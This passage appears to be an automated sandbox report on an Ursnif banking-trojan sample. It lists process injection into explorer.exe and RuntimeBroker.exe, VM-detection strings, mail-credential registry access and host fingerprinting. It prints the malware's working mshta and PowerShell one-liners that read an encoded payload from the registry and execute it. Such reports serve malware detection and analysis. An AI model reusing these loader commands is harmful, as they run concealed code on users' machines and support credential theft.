          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\control.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4964
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3735
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2800Thread sleep time: -11990383647911201s >= -30000s
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_033F3512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,2_2_033F3512
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB7500 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,RtlDeleteBoundaryDescriptor,32_2_04DB7500
          Source: C:\Windows\explorer.exeCode function: 32_2_04DBAACC CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,32_2_04DBAACC
          Source: explorer.exe, 00000020.00000000.838346631.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000020.00000000.839224347.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000020.00000000.850009124.000000000FCFE000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000020.00000002.1030805328.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000020.00000000.838346631.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000020.00000000.843142954.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000020.00000000.838346631.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000020.00000000.843142954.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000020.00000000.838346631.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Allocates memory in foreign processesShow sources
          Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000 protect: page execute and read and write
          Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B4F85E0000 protect: page execute and read and write
          Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1DA4C230000 protect: page execute and read and write
          Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\System32\rundll32.exe base: 1E7A4010000 protect: page execute and read and write
          Changes memory attributes in foreign processes to executable or writableShow sources
          Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
          Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
          Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
          Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
          Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
          Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
          Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
          Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
          Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
          Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
          Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute read
          Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
          Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
          Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute read
          Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
          Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
          Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute read
          Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
          Source: C:\Windows\System32\control.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
          Source: C:\Windows\System32\control.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute read
          Source: C:\Windows\System32\control.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
          Compiles code for process injection (via .Net compiler)Show sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.0.csJump to dropped file
          Creates a thread in another existing process (thread injection)Show sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: BD4F1580
          Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
          Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
          Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
          Source: C:\Windows\explorer.exeThread created: unknown EIP: BD4F1580
          Source: C:\Windows\explorer.exeThread created: unknown EIP: BD4F1580
          Source: C:\Windows\explorer.exeThread created: unknown EIP: BD4F1580
          Source: C:\Windows\System32\control.exeThread created: unknown EIP: BD4F1580
          Injects code into the Windows Explorer (explorer.exe)Show sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 9EA000 value: 00
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 7FFABD4F1580 value: EB
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 3110000 value: 80
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 7FFABD4F1580 value: 40
          Maps a DLL or memory area into another processShow sources
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
          Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
          Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
          Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
          Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
          Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Program Files\internet explorer\iexplore.exe protection: execute and read and write
          Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
          Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\SysWOW64\regsvr32.exeThread register set: target process: 5528Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3424
          Source: C:\Windows\explorer.exeThread register set: target process: 3656
          Source: C:\Windows\explorer.exeThread register set: target process: 4268
          Source: C:\Windows\explorer.exeThread register set: target process: 4772
          Source: C:\Windows\explorer.exeThread register set: target process: 2932
          Source: C:\Windows\explorer.exeThread register set: target process: 2388
          Source: C:\Windows\explorer.exeThread register set: target process: 1380
          Source: C:\Windows\explorer.exeThread register set: target process: 6720
          Source: C:\Windows\System32\control.exeThread register set: target process: 3424
          Source: C:\Windows\System32\control.exeThread register set: target process: 6488
          Writes to foreign memory regionsShow sources
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\System32\control.exe base: 7FF635E612E0Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\System32\control.exe base: 7FF635E612E0Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 9EA000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFABD4F1580
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 3110000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFABD4F1580
          Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 8C7CFF1000
          Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
          Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000
          Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
          Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7386879000
          Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
          Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1B4F85E0000
          Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
          Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD2179000
          Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
          Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1DA4C230000
          Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
          Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 7FF6C5CF5FD0
          Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 1E7A4010000
          Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 7FF6C5CF5FD0
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exeJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.cmdline'
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3AD7.tmp' 'c:\Users\user\AppData\Local\Temp\gayi4abp\CSC8A545143BD644266B89F65F281FEEFE4.TMP'
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4CF7.tmp' 'c:\Users\user\AppData\Local\Temp\wi0gyoxl\CSCA00873215094E3995281D323D18ADB7.TMP'
          Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
          Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
          Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
          Source: explorer.exe, 00000020.00000000.827609490.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000020.00000000.839211937.0000000005E50000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000020.00000000.843142954.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_033FA12A cpuid 2_2_033FA12A
          Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_033F8714 HeapCreate,GetTickCount,GetSystemTimeAsFileTime,SwitchToThread,_aullrem,Sleep,IsWow64Process,2_2_033F8714
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_033FA12A wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,2_2_033FA12A
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_033FA667 GetVersionExA,wsprintfA,2_2_033FA667
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756834396.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.757094154.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.765016021.0000000005DAB000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756986766.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.757116216.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756877993.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.757051571.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756945473.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.825598679.0000000003470000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.845341823.0000000003430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756743295.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5424, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5876, type: MEMORY
          Tries to steal Mail credentials (via file access)Show sources
          Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
          Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

          Remote Access Functionality:

          barindex
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756834396.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.757094154.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.765016021.0000000005DAB000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756986766.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.757116216.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756877993.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
